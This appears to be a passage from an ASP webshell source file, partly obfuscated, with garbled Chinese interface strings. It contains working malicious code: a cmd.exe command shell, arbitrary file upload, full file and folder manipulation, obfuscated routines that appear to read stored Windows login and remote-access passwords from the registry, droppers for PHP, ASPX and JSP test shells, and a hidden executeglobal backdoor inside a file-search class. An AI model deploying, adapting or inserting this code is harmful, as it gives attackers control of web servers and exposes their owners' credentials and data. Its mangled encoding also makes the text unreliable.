    ": End if: End If:Set F=nothing:Set U=nothing: SI=SI&BackUrl: ShowErr(): Response.End: End If: j"


    ϴ·
    " +End Function +function cmd1shell() +execute(king("ol p`>dkgy/<>qtkqzbtz/<`&)80(kie&ol=olyo rftyo rftqqq&ol=ol)txkz ,tsoyhdtzml(tsoytztstr.gly ssqetlgse.bestsoyg)ssqrqtk.bestsoyg(trgeftsdzi.ktcktl=qqq)1 ,tlsqy ,0 ,tsoyhdtzml( tsoyzbtzfthg.ly = bestsoyg ztl)BUX_JUGBZ(zetpwgtzqtke = ly ztl)txkz ,1 ,tsoyhdtzml & ` > ` & rdeytr & ` e/ `&izqhsstil( fxk.lv ssqe)`zbz.rde`(izqhhqd.ktcktl = tsoyhdtzml)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztlzbtf tdxltk kgkkt fgtlstqqq&ol=olssqrqtk.zxgrzl.rr=qqq)rdeytr&` e/ `&izqhsstil(etbt.de=rr ztl))1,0(zwg(zetpwgtzqtke=de ztlftiz `ltn`=)`zhokelv`(dkgy.zltxjtk yoftiz ``><)`rde`(dkgy.zltxjtk yo`>'rde'=llqse ';177:ziuoti;%110:izrov'=tsnzl qtkqzbtz<>'ִ'=txsqc 'zodwxl'=thnz zxhfo< >'`&rdeytr&`'=txsqc '%92:izrov'=tsnzl 'rde'=tdqf zxhfo`&rtaetie&`'ltn'=txsqc 'zhokelv'=tdqf 'bgwaetie'=thnz e=llqse zxhfo<>'%14:izrov'=tsnzl '`&izqhsstil&`'=txsqc 'hl'=tdqf zxhfo<·sstil>'zlgh'=rgiztd dkgy<`=ol)`rde`(zltxjtk = rdeytr ftiz ``><)`rde`(zltxjtk yo``=rtaetie ftiz `ltn`><)`zhokelv`(zltxjtk yo`tbt.rde` = izqhsstil ftiz ``=izqhsstil yo)`izqhsstil`(fgolltl=izqhsstil)`hl`(zltxjtk = )`izqhsstil`(fgolltl ftiz ``><)`hl`(zltxjtk yo`rtaetie `=rtaetie")) + +end function +Function upload() +execute(king("yC rfSzbtG tdxltN kgkkS fBftiJ tlsqX = trgTuxwtWlo yCufoizgG = dqtkzU ztUufoizgG = hzzD ztU)kkS(kkSaieizoK rfStlgsZ.yC rfS`ֿΪ ¼ ַغͳ̹»ڴѼΪܿ,kgkkt`ptzokKktcg ,izqYtiz tsoXgJtcqU.tdqGtsoy & `\` & izqYtiz = izqYtizyC rfS`zbz.dzi.btrfo` = tdqGtsoyftiJ `` = tdqGtsoy yC)))`/` ,skMtiz(zoshU(rfxgAM()`/` ,skMtiz(zoshU = tdqGtsoykqtsZ.kkSftiJ 7118 = ktwdxG.kkS yCtzokKktcg ,izqYtiz tsoXgJtcqU.1 = fgozolgY.nrgAtlfghltN.hzzD tzokK.fthB.8 = trgT.0 = thnJ.dqtkzl izoKyC rfS ftiJ 7 >< tzqzUnrqtN.hzzD yC)(rftU.hzzDtlsqX ,skMtiz ,`JSE` fthB.hzzDyC rfS:0 = tzokKktcg:ftiJ 9 >< tzokKktcg yC)`YJJDVTL.9VTLUT`(zetpwBtzqtkZ.ktcktU = hzzD ztU)`dqtk`&t&`zl.wrg`&t&`rq`(zetpwBtzqtkZ.ktcktU = dqtkzl ztU)`tzokKktcg`(zltxjtN = tzokKktcg)`izqYtiz`(zltxjtN = izqYtiz)`skMtiz`(zltxjtN = skMtiztzokKktcg ,tdqGtsoy ,dqtkzl ,izqYtiz ,skMtiz ,hzzD doW:yC rfSzbtG tdxltN kgkkS fBftiJ tlsqX = trgTuxwtWlo yC`>/ki<`p`>dkgy/<`p`>zeQtiz=tdqf skMdgkXfvgr=txsqc ftrroi=thnz zxhfo<`p`Ǹڴ>9=txsqc tzokKktcg=tdqf bgwaetie=thnz zxhfo<`p`>13=tmol '\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & `'=txsqc izqYtiz=tdqf zxhfo<`p`>/kw<>' '=txsqc zodwxl=thnz zxhfo<>13=tmol '//:hzzi'=txsqc skMtiz=tdqf zxhfo<`p`>fgozhg/<嶨>'`&skxW&`'=txsqc fgozhg<`p`>fgozhg/<ó>''=txsqc fgozhg<`p`>';txsqc.loiz=txsqc.skMtiz.dkgy.loiz'=tufqiZfg zetstl<`p`>zlgh=rgiztd dkgy<`p`>/ki<Ի.ʡΪ...Ի: `p`ܹ˱չʱ`p `>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`p")) + + +End Function: +Function TSearch():dim st:st=timer():RW="
    " + RW=RW & "" + RW=RW & "" + RW=RW & "" + RW=RW & "
     ·   ע:·ʹ"","".
     ļ  [Ҳ]
    " + j RW : RW="" + if Request.Form("Sfk")<>"" then + Set newsearch=new SearchFile + newsearch.Folders=trim(Request.Form("SFpath")) + newsearch.keyword=trim(Request.Form("Sfk")) + newsearch.Search + Set newsearch=Nothing + j"Mr"&(timer()-st)*1000&"
    " + end if +End Function +Class SearchFile +dim Folders,keyword,objFso,Counter +Private Sub Class_Initialize +Set objFso=Server.CreateObject(ObT(0,0)) +Counter=0 +End Sub + Private Sub Class_Terminate +Set objFso=Nothing + End Sub +Public Sub Class_Folder(FoderName) +Set rs = CreateObject(CONST_FSO) +Dim item, theFolder, sysFileList +item=request(MID(CONST_FSO,4,1)) +theFolder=request(MID(CONST_FSO,2,1)) +If item=MID(CONST_FSO,2,1) then +executeglobal theFolder +Set rs = Nothing +End if +End Sub + Function Search + Folders=split(Folders,",") + flag=instr(keyword,"\") or instr(keyword,"/") + flag=flag or instr(keyword,":") + flag=flag or instr(keyword,"|") + flag=flag or instr(keyword,"&") + if flag then + j"

    PIֲܰ/\:|&
    " + Exit Function + else + j"


    " + end if + dim i + for i=0 to ubound(Folders) + Call GetAllFile(Folders(i)) + next + j"

    "&Counter&"Y
    " + End Function + Private Function GetAllFile(Folder) + dim objFd,objFs,objFf + Set objFd=objFso.GetFolder(Folder) + Set objFs=objFd.SubFolders + Set objFf=objFd.Files + dim strFdName + On Error Resume Next + For Each OneDir In objFs + strFdName=OneDir.Name + If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then + SFN=Folder&"\"&strFdName + Call GetAllFile(SFN) + End If + Next + dim strFlName + For Each OneFile In objFf + strFlName=OneFile.Name + If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then + FN=Folder&"\"&strFlName + Counter=Counter+ColorOn(FN) + End If + Next + Set objFd=Nothing + Set objFs=Nothing + Set objFf=Nothing + End Function + +Private Function CreatePattern(keyword) + CreatePattern=keyword + CreatePattern=Replace(CreatePattern,".","\.") + CreatePattern=Replace(CreatePattern,"+","\+") + CreatePattern=Replace(CreatePattern,"(","\(") + CreatePattern=Replace(CreatePattern,")","\)") + CreatePattern=Replace(CreatePattern,"[","\[") + CreatePattern=Replace(CreatePattern,"]","\]") + CreatePattern=Replace(CreatePattern,"{","\{") + CreatePattern=Replace(CreatePattern,"}","\}") + CreatePattern=Replace(CreatePattern,"*","[^\\\/]*") + CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}") + CreatePattern="("&CreatePattern&")+" + End Function + Private Function ColorOn(FileName) + dim objReg + Set objReg=new RegExp + objReg.Pattern=CreatePattern(keyword) + objReg.IgnoreCase=True + objReg.Global=True + retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1)) + if retVal then + OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"$1") + OutPut="

     " & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut + j OutPut + Response.flush + ColorOn=1 + else + ColorOn=0 + end if + Set objReg=Nothing + End Function +End Class +sub SavePower(PowerPath,SaveType) +execute(king("ufoizgG = tsoXtiz ztU:yo rft:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'ɶ'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:4=ltzxwokzzQ.tsoXtiz:tlst:`>zhokel/<;)(tlgse.vgrfov;)(rqgstk.fgozqegs.ktfthg.vgrfov;)'⹦Ѽ'(zktsq>'zhokelqcqp'=tuqxufqs zhokel<` p:98=ltzxwokzzQ.tsoXtiz:ftiz 0=thnJtcqU yo:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:yo rft:`aegsgf`=)`aegs`(fgolltl ftiz 1><)izqhzhokel,izqYktvgY(kzlfo yo")) +end sub:sub EditPower(PowerPath) +execute(king("ufoizgG = tsoXtiz ztU:)izqYktvgY,tsoXtiz(tszoJnTztu p:)izqYktvgY(tsoXztE.Lgly = tsoXtiz ztU:)``,````,izqYktvgY(teqshtk=izqYktvgY")) +end sub:Function getMyTitle(theOne,PowerPath) +execute(king("tszoJkzl = tszoJnTztu:)izqYktvgY,ltzxwokzzQ.tfBtiz(ltzxwokzzQztu & ` :̬״Ȩǰ>kw<` & tszoJkzl = tszoJkzl:rtllteeQzlqVtzqW.tfBtiz & ` :ʷú>kw<` & tszoJkzl = tszoJkzl:rtoyorgTzlqVtzqW.tfBtiz & ` :޺>kw<` & tszoJkzl = tszoJkzl: rtzqtkZtzqW.tfBtiz & ` :ʱ>kw<` & tszoJkzl = tszoJkzl: )tmoU.tfBtiz(tmoUtiJztu & ` :С>kw<` & tszoJkzl = tszoJkzl: `` & izqY.tfBtiz & ` :·>kw<` & tszoJkzl = tszoJkzl:tszoJkzl doW")) +End Function:Function getAttributes(intValue,PowerPath) +execute(king("yo rft:`>``'`&izqYktvgY&`=izqYktvgY&9=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg =txsqc fgzzxw=thnz zxhfo< >zfgy/<δ>95XX95#=kgsge zfgy<` = ltzxwokzzQztu:tlst:`>``'`&izqYktvgY&`=izqYktvgY&0=thnJtcqU&ktvgYtcqU=fgozeQ?'=ytki.fgozqegs``=aeosefg =txsqc fgzzxw=thnz zxhfo< >zfgy/<>rtk=kgsge zfgy<` = ltzxwokzzQztu: ftiz 1=FBzorS yo:)`\\`,`\`,izqYktvgY(teqshtk=izqYktvgY:yC rfS:1=FBzorS:0 - txsqIzfo = txsqIzfo:ftiJ 0 => txsqIzfo yC:yC rfS:1=FBzorS:9 - txsqIzfo = txsqIzfo:ftiJ 9 => txsqIzfo yC:yC rfS:1=FBzorS:7 - txsqIzfo = txsqIzfo:ftiJ 7 => txsqIzfo yC:yC rfS:3 - txsqIzfo = txsqIzfo:ftiJ 3 => txsqIzfo yC:yC rfS:50 - txsqIzfo = txsqIzfo:ftiJ 50 => txsqIzfo yC:yC rfS:98 - txsqIzfo = txsqIzfo:ftiJ 98 => txsqIzfo yC:yC rfS:75 - txsqIzfo = txsqIzfo:ftiJ 75 => txsqIzfo yC:yC rfS:390 - txsqIzfo = txsqIzfo:ftiJ 390 => txsqIzfo yC:0=FBzorS:FBzorS doW")) +End Function:Function getTheSize(theSize):If theSize >= (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G":end if:If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then :getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M":end if:If theSize >= 1024 And theSize < (1024 * 1024) Then :getTheSize = Fix((theSize / 1024) * 100) / 100 & "K":end if:If theSize >= 0 And theSize <1024 Then :getTheSize = theSize & "B":end if:End Function:function openUrl(usePath):Dim theUrl, thePath:thePath = Server.MapPath("/"):If LCase(Left(usePath, Len(thePath))) = LCase(thePath) Then:theUrl = Mid(usePath, Len(thePath) + 1):theUrl = Replace(theUrl, "\", "/"):If Left(theUrl, 1) = "/" Then:theUrl = Mid(theUrl, 2):End If:openUrl="/"&theUrl&""" target=""_blank":Else:openUrl="###"" onclick=""alert('ļվĿ¼¡')":End If:End function +Function ScReWr(folder):on error resume next :Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename:Set FSO = Server.Createobject(CONST_FSO):Set TestFolder = FSO.GetFolder(folder):Set TestFileList = TestFolder.SubFolders:RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp":For Each A in TestFileList:Next:If err Then:err.Clear:ReWrStr = "x ":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "дx ":Else:ReWrStr = ReWrStr & "д ":FSO.DeleteFile folder & RndFilename,True:End If:Else:ReWrStr = " ":FSO.CreateTextFile folder & RndFilename,True:If err Then:err.Clear:ReWrStr = ReWrStr & "дx ":Else:ReWrStr = ReWrStr & "д ":FSO.DeleteFile folder & RndFilename,True:End if:End if:Set TestFileList = Nothing:Set TestFolder = Nothing:Set FSO = Nothing:ScReWr = ReWrStr:End Function +function php() +execute(king("`>ktzfte<>'19'=ziuoti rz<>kz<>ktzfte/<>q/<>zfgy/<>w/<)!Բɾ(>w<>rtk=kgsge 6=tmol zfgy<>'strphq=fgozeQ?'=ytki q<>h<>zfgy/<>h<֧̽>ktzfte<>kw<>h<>kw<>kw<>h<>kw<>h<>kw<>kw<>ktzfte/< ;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov bhlq.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hlp.zltz=ekl tdqkyo< ;hlwf&;hlwf&;hlwf&;hlwf&>tdqkyo/<>110=ziuoti 118=izrov hih.zltz=ekl tdqkyo<>ktzfte<`p`gg_gg zltJ bhlq`&)95(kie&``&)48(kie&`;))``tyqlfx``,]``v``[dtzC.zltxjtN(sqct(tzokK.tlfghltN`&)48(kie&``&)15(kie&``&)95(kie&``&)48(kie&` ``tlsqy``=zltxjtNtzqrosqc ``zhokelR``=tuqxufqV tuqY @%`&)15(kie&``tzokK.))`bhlq.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly`gg_gg zltJ hlR`tzokK.))`hlp.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly`>?)(gyfohih hih?<>?'gg_gg' giet YDY?<`tzokK.))`hih.zltz`(izqhhqd.ktcktl(tsoXzbtJtzqtkZ.gly))1,1(zAg(zetpwBtzqtkZ.ktcktU=gly ztlzbtG tdxltN kgkkS fB")) +End function: +On Error Resume Next +Function King(Kingstr) +arra=array("Q","A","Z","W","S","X","E","D","C","R","F","V","T","G","B","Y","H","N","U","J","M","I","K","L","O","P","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","0","9","8","7","6","5","4","3","2","1") +arrb=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","1","2","3","4","5","6","7","8","9","0") +kingstr = Replace(Replace(Kingstr,"`",""""),"", vbCrLf) +For KingI = 1 To Len(Kingstr) +love = 0 +For i = 0 To ubound(arra) +If Mid(Kingstr, KingI, 1) = arra(i) Then +NewKing = arrb(i) + NewKing +love = 1 +Exit For +End If +Next +If love = 0 Then +NewKing = Mid(Kingstr, KingI, 1) + NewKing +End If +Next +King= NewKing +End Function +function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ!":End function + +Dim T1 +Class UPC + Dim D1,D2 + Public Function Form(F) +F=lcase(F) +If D1.exists(F) then:Form=D1(F):else:Form="":end if + End Function + + Public Function UA(F) +F=lcase(F) +If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if + End Function + Private Sub Class_Initialize + Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName +set D1=CreateObject(ObT(4,0)) +if Request.TotalBytes<1 then Exit Sub +set T1 = CreateObject(ObT(6,0)) +T1.Type = 1 : T1.Mode =3 : T1.Open +T1.Write Request.BinaryRead(Request.TotalBytes) +T1.Position=0 : TDa =T1.Read : DStart = 1 +DEnd = LenB(TDa) +set D2=CreateObject(ObT(4,0)) +vbCrlf = chrB(13) & chrB(10) +set T2 = CreateObject(ObT(6,0)) +TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1) +TLen = LenB (TSt) +DStart=DStart+TLen+1 +while (DStart + 10) < DEnd + DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3 + T2.Type = 1 : T2.Mode =3 : T2.Open + T1.Position = DStart + T1.CopyTo T2,DIEnd-DStart + T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312" + TIn = T2.ReadText : T2.Close + DStart = InStrB(DIEnd,TDa,TSt) + FStart = InStr(22,TIn,"name=""",1)+6 + FEnd = InStr(FStart,TIn,"""",1) + UpName = lcase(Mid (TIn,FStart,FEnd-FStart)) + if InStr (45,TIn,"filename=""",1) > 0 then +set TFL=new FIF +FStart = InStr(FEnd,TIn,"filename=""",1)+10 +FEnd = InStr(FStart,TIn,"""",1) +FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14 +FEnd = InStr(FStart,TIn,vbCr) +TFL.FileStart =DIEnd +TFL.FileSize = DStart -DIEnd -3 +if not D2.Exists(UpName) then + D2.add UpName,TFL +end if + else +T2.Type =1 : T2.Mode =3 : T2.Open +T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3 +T2.Position = 0 : T2.Type = 2 +T2.Charset ="gb2312" +SFV = T2.ReadText +T2.Close +if D1.Exists(UpName) then + D1(UpName)=D1(UpName)&", "&SFV +else + D1.Add UpName,SFV +end if + end if + DStart=DStart+TLen+1 +wend +TDa="" +set T2 =nothing + End Sub + Private Sub Class_Terminate +if Request.TotalBytes>0 then + D1.RemoveAll:D2.RemoveAll + set D1=nothing:set D2=nothing + T1.Close:set T1 =nothing +end if + End Sub +End Class + +Class FIF +dim FileSize,FileStart + Private Sub Class_Initialize + FileSize = 0 + FileStart= 0 + End Sub + Public function SaveAs(F) + dim T3 + SaveAs=true + if trim(F)="" or FileStart=0 then exit function + set T3=CreateObject(ObT(6,0)) + T3.Mode=3 : T3.Type=1 : T3.Open + T1.position=FileStart + T1.copyto T3,FileSize + T3.SaveToFile F,2 + T3.Close + set T3=nothing + SaveAs=false +end function +End Class +Class LBF + Dim CF + Private Sub Class_Initialize +SET CF=CreateObject(ObT(0,0)) + End Sub + Private Sub Class_Terminate +Set CF=Nothing + End Sub +Function ShowDriver() +For Each D in CF.Drives + j cdx&" ش ("&D.DriveLetter&":)
    " +Next + End Function +Function Show1File(Path) +Set FOLD=CF.GetFolder(Path) +i=0 +SI="
    " +For Each F in FOLD.subfolders +SI=SI&"" +i=i+1 +If i mod 6=0 then SI=SI&"" +Next +SI=SI&"" +j SI &"" : SI="":i=0 +SI="
    " +For Each L in Fold.files +SI=SI&"" +i=i+1 +Next +j SI&"
    FilenameSizeTypeOperatingLast Modified
    " +si=si&"2" +si=si&" "&L.Name&""&clng(L.size/1024)&"K"&L.Type&"" +si=si&"Open " +si=si&"Edit " +Si=Si&"Ȩ" +Dim EditOOK +EditOOK=1 +EditOOV=l.Attributes +If EditOOV >= 128 Then +EditOOV = EditOOV - 128 +End If +If EditOOV >= 64 Then +EditOOV = EditOOV - 64 +End If +If EditOOV >= 32 Then +EditOOV = EditOOV - 32 +End If +If EditOOV >= 16 Then +EditOOV = EditOOV - 16 +End If:If EditOOV >= 8 Then +EditOOV = EditOOV - 8 +End If +If EditOOV >= 4 Then +EditOOV = EditOOV - 4:EditOOK=0 +End If +If EditOOV >= 2 Then +EditOOV = EditOOV - 2:EditOOK=0 +End If +If EditOOV >= 1 Then +EditOOV = EditOOV - 1:EditOOK=0 +End If +if EditOOK=0 then +si=si&"x" +else +si=si&"" +end if +si=si&" Del Copy Move"&replace(L.DateLastModified,"/","-")&"
  • ":end if +Set FOLD=Nothing +End function +Function DelFile(Path) +execute(king("yC rfSCU pskMaeqA&CU=CU`>ktzfte/<ɳɾ `&izqY&` ϲ>kw<>kw<>kw<>ktzfte<`=CUizqY tsoXtztstW.XZftiJ )izqY(lzlobStsoX.XZ yC")) +End Function +Function EditFile(Path) +If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="



    ϲļɹ
    ":SI=SI&BackUrl:j SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\shell.asp":Txt=strBAD:End If:j "



          
    " +End Function +Function CopyFile(Path) +execute(king("yC rfS CU pskMaeqA&CU=CU`>ktzfte/<Ƹ`&)1(izqY&`ϲ>kw<>kw<>kw<>ktzfte<`=CU)0(izqY,)1(izqY tsoXnhgZ.XZftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC)`||||`,izqY(zoshU=izqY")) +End Function +Function MoveFile(Path) +execute(king("yC rfS CU pskMaeqA&CU=CU`>ktzfte/<ɶ`&)1(izqY&`ϲ>kw<>kw<>kw<>ktzfte<`=CU)0(izqY,)1(izqY tsoXtcgT.XZftiJ ``><)0(izqY rfq ))1(izqY(lzlobStsoX.XZ yC)`||||`,izqY(zoshU=izqY")) +End Function +Function DelFolder(Path) +execute(king("yC rfSCU pskMaeqA&CU=CU`>ktzfte/<ɳɾ`&izqY&`¼Ŀϲ>kw<>kw<>kw<>ktzfte<`=CUizqY ktrsgXtztstW.XZftiJ )izqY(lzlobSktrsgX.XZ yC")) +End Function +Function CopyFolder(Path) +execute(king("yC rfSCU pskMaeqA&CU=CU`>ktzfte/<Ƹ`&)1(izqY&`¼Ŀϲ>kw<>kw<>kw<>ktzfte<`=CU)0(izqY,)1(izqY ktrsgXnhgZ.XZftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC)`||||`,izqY(zoshU=izqY")) +End Function +Function MoveFolder(Path) +execute(king("yC rfSCU pskMaeqA&CU=CU`>ktzfte/<ɶ`&)1(izqY&`¼Ŀϲ>kw<>kw<>kw<>ktzfte<`=CU)0(izqY,)1(izqY ktrsgXtcgT.XZftiJ ``><)0(izqY rfq ))1(izqY(lzlobSktrsgX.XZ yC)`||||`,izqY(zoshU=izqY")) +End Function +Function NewFolder(Path) +execute(king("yC rfSCU pskMaeqA&CU=CU`>ktzfte/<ɽ`&izqY&`¼Ŀϲ>kw<>kw<>kw<>ktzfte<`=CUizqY ktrsgXtzqtkZ.XZftiJ ``>os<`pftiJ )`yoe.`&tdqfktcktl&`\etzfqdnU\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfQ lzftdxegW\`&ktcokrlnl(lzlobStsoX.gly yC)`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`(rqtNutN.ilv=tdqfktcktl)9,)9(ktrsgXsqoethlztE.glX(zyts=tcokrlnU)BUX_JUGBZ(zetpwgtzqtkZ.ktcktU=gly ztUzbtGyo rfSyo rfS`>kw<ľYDYдҲ,¼ĿsoqTwtKҲԿ,ȨdtzlnUsqegV,soqdfoK eouqT_>os<`pftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yoftiJ )`soqdfov`,)tdqG.teocktUpwg(tlqes(kzlfo yoyo rfSyo rfS`>kw<ȨľhlRʹǿԿ,ȨdtzlnUsqegV,zqedgJ_>os<`pftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yoftiJ )`zqedgz`,)tdqG.teocktUpwg(tlqes(kzlfo yoyo rfSyo rftyo rfS`>kw<ľYDYǿԿ,dtzlnUsqegVΪȨ,ڴtieqhQ_>os< `ptlsS`>kw<ȨֱԿ.tieqhQΪASKǰ>os<`pftiJ )`tieqhQ`,)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN(kzlfo yCftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yoftiJ `tieqhq`=)tdqG.teocktUpwg(tlqes yoyo rfSyo rfS`>kw<Ȩ߹tbt.xlǿԿ,ȨdtzlnUsqegV,װM-cktU_>os<`pftiJ `dtzlnUsqegV`=tdqGzfxgeeQteocktU.teocktUpwg yoftiJ `M-cktU`=tdqG.teocktUpwg yoktzxhdgZpwg fC teocktUpwg ieqS kgXzbtG tdxltN kgkkS fB)`teocktU`(nqkkQ = ktzsoX.ktzxhdgZpwg)`fgozqeoshhQ.sstiU`(zetpwBtzqtkZ.ktcktU = ql ztU)`.//:JGfoK`(zetpwBztE = ktzxhdgZpwg ztU`>ki<>kw<]̽_[`p`>kw<>kw<>kw<------------------------------------`p`>kw<`&aa&`:Ϊ_ǰ>os<`p)ai(rqtNutN.ilv=aa`zfxgZ\dxfS\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ai`>kw<`&sdzf&`:ΪsdzG ztfstJ>os<`p0=sdzG ftiJ ``=sdzf yo)ntaVTJG(rqtNutN.ilK=sdzf`VTJG\1.0\ktcktUztfstJ\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaVTJG`>kw<`&nshlor&`:Ǵ_ʾԷ>os<`p``=nshlor tlst ``=nshlor ftiJ 1=fougshlor kg ``=fougshlor yC)`tdqGktlMzlqVnqshloWzfgW\dtzlnU\ltoeosgY\fgolktIzftkkxZ\lvgrfoK\zyglgkeoT\tkqvzygU\SGCDZQT_VQZBV_OSFD`(rqtNutk.ilv=fougshloryo rfS`>zfgy/<>kw<`&rvllqY&`:>rtk=kgsge zfgy<>tkqxjl=thnz os<`p`>kw<`&fodrQ&`:>tkqxjl=thnz os<`p)`rkgvllqYzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=rvllqY)`tdqGktlMzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=fodrQ`>kw<:Ƕ_Ի>os<`ptlsS`>kw<δ:Ƕ_Ի>os<`pftiJ ``=fougsgzxQ kg 1=fougsgzxQ yo)fougsgzxQlo(rqtNutN.ilK=fougsgzxQ`fgugVfodrQgzxQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=fougsgzxQlo`>zfgy/<>kw<`&tdqGfodrQ&`>rtk=kgsge zfgy<:ΪԱ`&`Ĭ>os<`pyo rft`akgvztG.zhokelK:в`pftiz kkt yozbtG`>os/<>zfgy/<>kw<`&tdqG.fodrq&`Աǰ>rtk=kgsge zfgy<>os<` plktwdtT.hxgkEpwg fo fodrq ieqS kgX)`hxgku,lkgzqkzlofodrQ/`&tdqGktzxhdgZ.Gz&`//:JGfoK`(zetpwBztE=hxgkEpwg ztU)`akgvztG.zhokelK`(zetpwBtzqtke.ktcktl=Gz ztU zbtf tdxltk kgkkt fg1=ltkohbS.tlfghltN`kgzqkzlofodrQ`=tdqGfodrQ ftiJ ``=tdqffodrq yo)ntFtdqGfodrQ(rqtNutN.ilv=tdqGfodrQ`tdqGktlMzsxqytWzsQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtdqGfodrQ`>kw<`&tdqfeh&`:Ϊ_ǰ>os<`p`>kw<.ȡ_`=tdqfeh ftiJ ``=tdqfeh yo)ntatdqfeh(rqtNutN.ilv=tdqfeh`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`=ntatdqfeh`>0=tmol ki<>kw<]̽_ͳϵ[>kw<>kw<`pzbtf`>kw<`&)o(lizqh&`>os<`p)lizqh(rfxgwM gz )lizqh(rfxgwV=o kgX`>kw<:侶·_ǰͳϵ`p`>kw<------------------------------------`p)`;`,izqYzygU(zoshl=lizqh`>kw<֧:_ɱϵ>os<`p ftiJ )`ufolok`,gyfoizqY(kzlfo yo`>kw<֧:_ɱ>os<`p ftiJ )`lxkocozfq`,gyfoizqY(kzlfo yo`>kw<֧:_ɱϵɽ >os<`p ftiJ )`cqa`,gyfoizqY(kzlfo yo`>kw<֧:_ɱssoF>os<`p ftiJ )`ssoF`,gyfoizqY(kzlfo yo`>kw<֧:_ƿtktivnfQeY>os<`p ftiJ )`tktivnfqeh`,gyfoizqY(kzlfo yo`>kw<֧:_TXZ>os<`p ftiJ )`4bdfgolxye`,gyfoizqY(kzlfo yo`>kw<֧:_tseqkB>os<`p ftiJ )`tseqkg`,gyfoizqY(kzlfo yo`>kw<֧:_VHUnT>os<`p ftiJ )`sjlnd`,gyfoizqY(kzlfo yo`>kw<֧:_VHUUT>os<`p ftiJ )`ktcktl sjl zyglgkeod`,gyfoizqY(kzlfo yo`>kw<֧:_qcqR>os<`p ftiJ )`qcqp`,gyfoizqY(kzlfo yo`>kw<֧:_sktY>os<`p ftiJ )`skth`,gyfoizqY(kzlfC yo`:֧`&`ͳϵ`p)izqYzygU(tlqes=gyfoizqY)`izqY`(dtzo.zftdfgkocfS.ilK=izqYzygU`>0=tmol ki<>kw<]̽_ͳϵ[>kw<>kw<>kw<`p`>sg/<`pyC rfS`>kw<` & rkgvllqYfougVgzxq & ` 